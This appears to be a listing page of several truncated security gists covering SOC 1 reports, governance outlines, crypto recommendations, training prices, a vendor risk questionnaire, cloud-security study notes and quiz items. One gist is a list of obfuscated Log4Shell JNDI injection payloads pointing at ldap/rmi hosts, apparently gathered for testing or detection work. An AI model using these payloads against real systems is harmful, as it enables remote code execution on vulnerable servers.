This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SOC 1 - SOC for Service Organizations: ICFR | |
============================================ | |
Report on Controls at a Service Organization Relevant to User Entities’ Internal Control over Financial Reporting (ICFR) | |
These reports, prepared in accordance with AT-C section 320, Reporting on an Examination of Controls at a Service Organization Relevant to User Entities’ Internal Control Over Financial Reporting, are specifically intended to meet the needs of entities that use service organizations (user entities) and the CPAs that audit the user entities’ financial statements (user auditors), in evaluating the effect of the controls at the service organization on the user entities’ financial statements. | |
There are two types of reports for these engagements: | |
Type 2 - report on the fairness of the presentation of management’s description of the service organization’s system and the suitability of the design and operating effectiveness of the controls to achieve the related control objectives included in the descriptio |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Security Governance | |
SG1 Security Governance Approach | |
SG1.1 Security Governance Framework | |
SG1.2 Security Direction | |
SG2 Security Governance Components | |
SG2.1 Information Security Strategy | |
SG2.2 Risk Appetite | |
Information Risk Assessment | |
IR1 Information Risk Assessment Framework | |
IR1.1 Information Risk Assessment - Management Approach |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Recommendation of cryptographic algorithms: | |
Classification USA(NIST) Europe(ECRYPT) Korea(KISA) | |
Symmetric key encryption algorithm: | |
-AES-128/192/256 3TDEA | |
-AES-128/192/256,Blowfish, KASUMI,3TDEA | |
-SEED, HIGHT, ARIA-128/192/256 | |
Public key cryptography algorithm: | |
-RSA-2048 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(ISC)2 | |
Klassenraum Online Instructor-Led Training | |
Certified Authorisation Professional | CAP (3 Tage) | |
2950,-€ (exkl. MwSt) | |
2590,-€ (exkl. MwSt) | |
Certified Cloud Security Professional (CCSP) (6 Tage) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
${jndi:ldap://127.0.0.1:1389/ badClassName} | |
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l4j.zsec.uk/sploit} | |
${${::-j}ndi:rmi://l4j.zsec.uk/sploit} | |
${jndi:rmi://l4j.zsec.uk} | |
${${lower:jndi}:${lower:rmi}://l4j.zsec.uk/sploit} | |
${${lower:${lower:jndi}}:${lower:rmi}://l4j.zsec.uk/sploit} | |
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4j.zsec.uk/sploit} | |
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4j.zsec.uk/sploit} | |
${${upper:jndi}:${upper:rmi}://l4j.zsec.uk/sploit} | |
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://l4j.zsec.uk/sploit} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Third Party Security Risk Assessment | |
As part of the business relationship your organization has with XXX, XXX Security Risk needs to understand how your organization is protecting your organizations assets. The assessment contains questions about key security controls designed and operating effectively in your environment(s). The security controls assessment should be answered holistically for your organization as a whole. The assessment must be completed within thirty (30) days of receipt. | |
E-Mail-Adresse * | |
Organization Name * | |
Input the name of your organization. | |
XYZ | |
Respondent Name and Title * | |
Input the questionnaire respondent name and job title. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Module 1 | |
Internet of Things | |
Internet of Things is a blanket term for non-traditional computing devices used in the physical world that utilize Internet connectivity. It includes everything from Internet-enabled operational technology (used by utilities like power and water) to fitness trackers, connected light bulbs, medical devices, and beyond. | |
Cloud Computing | |
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. | |
Resource Pools | |
Resources pools are how we build clouds. They are a collection of physical resources that are pooled together so a consumer of the cloud can pull resources from the pool, use them while they need them, and put them back in the pool for someone else to use them over time. | |
Broad Network Access | |
All resources are availabl |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Module 1 | |
Cloud Computing | |
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. | |
Resource Pools | |
Resources pools are how we build clouds. They are a collection of physical resources that are pooled together so a consumer of the cloud can pull resources from the pool, use them while they need them, and put them back in the pool for someone else to use them over time. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
____ sits on top of _____ and adds an additional layer of integration with application development frameworks, middleware capabilities, and functions such as database, messaging, and queuing. PaaS, IaaS | |
_____ can be avenues for data leakage. Log files and metadata | |
_____ is the interconnection of disparate Directories Services. Federation | |
______ is focused on aligning with external requirements while _______ is focused on aligning with internal requirements. Compliance, governance |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Cloud Computing | |
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. | |
Resource Pools | |
Resources pools are how we build clouds. They are a collection of physical resources that are pooled together so a consumer of the cloud can pull resources from the pool, use them while they need them, and put them back in the pool for someone else to use them over time. | |
Broad Network Access |